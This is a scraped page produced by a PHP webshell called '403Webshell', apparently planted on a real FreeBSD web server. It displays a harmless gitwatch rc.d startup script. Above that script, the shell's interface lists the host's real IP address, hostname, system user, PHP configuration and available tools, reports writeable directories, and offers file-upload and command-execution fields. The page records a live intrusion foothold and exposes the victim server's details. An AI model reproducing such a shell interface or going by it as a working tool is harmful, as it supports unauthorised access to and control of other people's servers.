403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/gitwatch/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/gitwatch/files/gitwatch.in
#!/bin/sh

# PROVIDE: gitwatch
# REQUIRE: DAEMON
# KEYWORD: shutdown
#
# gitwatch_enable (bool):	Set it to "YES" to enable gitwatch
#				Default is "NO".
#
# gitwatch_targets (path):	Set the path to the target directory
#				Default is %%PREFIX%%/etc. Multiple targets can be separated by spaces
#

. /etc/rc.subr

name="gitwatch"
rcvar="gitwatch_enable"

start_cmd="${name}_start"

load_rc_config $name

: ${gitwatch_enable:=NO}
: ${gitwatch_targets:="%%PREFIX%%/etc"}
: ${gitwatch_args:="-l 10"}

command="%%PREFIX%%/bin/${name}"
command_interpreter="%%PREFIX%%/bin/bash"
command_args="${gitwatch_args}"

PATH="${PATH}:%%PREFIX%%/bin"

gitwatch_start() {

    # Start a gitwatch for each target
    for TARGET in ${gitwatch_targets}; do
		${command} ${command_args} "${TARGET}" >/dev/null &
	done
}

run_rc_command "$1"

Youez - 2016 - github.com/yon3zu
LinuXploit